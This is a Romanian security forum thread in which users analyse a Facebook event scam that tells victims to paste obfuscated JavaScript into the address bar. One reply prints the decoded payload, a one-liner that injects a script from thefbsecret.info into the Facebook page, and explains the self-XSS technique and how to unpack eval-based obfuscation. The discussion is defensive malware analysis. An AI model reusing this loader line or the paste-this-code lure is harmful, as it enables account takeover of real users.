JS suspect pentru FB

[AlStar]

Am primit pe FB o cerere de participare la un "event". Pe pagina "event-ului" este un link ce redirectioneaza pe-o pagina care te indruma sa scrii un cod..lung, in bara de adresa cand tab-ul cu FB este activ:

http://slexy.org/raw/s20FqIlPi1

Alea cu \x28,x\25..etc.. stiu cum sa decodez. Da' alea gen _0x9dd7x1 sau _0x4562 nu stiu..

[Nytro]

(a=(b=document).createElement('script')).src='//thefbsecret.info/jsp.php',b.body.appendChild(a);void(0)

L-am "decodat" in 10 secunde. Trebuie doar sa ai imaginatie...

[Birkoff]

da si eu de juma de zi tot primesc invitatii la acel eveniment si m-am saturat sa dau ignore... cu ocazia asta mi-am mai sters din "prieteni" ca sa nu ma mai streseze atat

[AlStar]

Nytro, imi dai te rog niste indicatii? Ca sa tin minte pentru alte dati.

Si, in concluzie, face vreo ceva scriptu' asta?

da si eu de juma de zi tot primesc invitatii la acel eveniment si m-am saturat sa dau ignore... cu ocazia asta mi-am mai sters din "prieteni" ca sa nu ma mai streseze atat

Eu aseara am dat "Report" si acu' vad ca nu mai e

Edited April 16, 2011 by AlStar

[Nytro]

Ai un "eval" acolo, care apeleaza o functie de decryptare. Functia decrypteaza totul, si returneaza rezultatul pentru a fi evaluat. Un simplu "document.write" sau un "alert" in loc de acel return e de ajuns pentru a vedea rezultatul si pentru a nu fi rulat.

Dar link-ul e catre un JS mai complex si cu care am avut probleme, cred ca a fost prost scris. Daca nu o sa am ce face o sa incerc sa vad ce face, dar e ceva cod si imi e lene.

Ideea de baza cu Facebook e urmatoare: pui fraieru sa ruleze cod JavaScript, poti face pe Facebook-ul lui cam tot ce ar putea face el, in afara doar de chestiile "sociale" ca: recunoaste persoana "x" sau coduri CAPTCHA sau cine stie ce altceva ce necesita o urma de inteligenta.

[bresti]

de curiozatate care sa uitat si la jsp.php de la hefbsecret.info/jsp.php ?